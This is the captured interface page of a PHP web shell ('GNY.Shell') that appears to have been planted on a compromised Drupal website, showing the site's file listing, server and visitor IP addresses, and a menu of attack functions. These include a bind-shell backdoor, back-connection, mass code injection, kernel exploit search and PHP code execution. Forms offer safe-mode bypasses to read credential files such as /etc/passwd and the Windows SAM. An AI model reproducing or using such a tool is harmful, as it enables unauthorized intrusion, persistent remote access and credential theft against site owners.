Free 846 GB of 912.5 GB (92.71%)Server IP: 95.211.216.69 - Your IP: 207.241.229.51

/var/www/html/piratpartietdk/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (20 files and 9 folders):

Name [asc] Size Modify Owner/Group Perms Action
. LINK 26.09.2015 01:02:14 0/0 drwxr-xr-x [info] 
.. LINK 25.09.2015 23:34:19 0/0 drwxr-xr-x [info] 
[profiles] DIR 25.09.2015 23:37:34 0/0 drwxr-xr-x [info] 
[includes] DIR 25.09.2015 23:35:10 0/0 drwxr-xr-x [info] 
[modules] DIR 25.09.2015 23:37:08 0/0 drwxr-xr-x [info] 
[themes] DIR 25.09.2015 23:56:20 0/0 drwxr-xr-x [info] 
[misc] DIR 25.09.2015 23:35:24 0/0 drwxr-xr-x [info] 
[public_html] DIR 25.09.2015 23:37:35 0/0 drwxr-xr-x [info] 
[sites] DIR 25.09.2015 23:50:09 0/0 drwxr-xr-x [info] 
[partier_paa_sociale_medier] DIR 25.09.2015 23:37:32 0/0 drwxr-xr-x [info] 
[scripts] DIR 25.09.2015 23:37:36 0/0 drwxr-xr-x [info] 
 web.config 2 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 1.45 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 syslog 696 B 25.09.2015 23:56:12 0/0 -rw-r--r-- [info] [change] [download] 
 CHANGELOG.txt 73.16 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 README.txt 5.25 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.4 KB 25.09.2015 23:34:53 0/0 -rw-r--r-- [info] [change] [download] 
 update.php 18.96 KB 25.09.2015 23:56:23 0/0 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.05 KB 26.09.2015 01:02:14 0/0 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 8 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.01 ]:.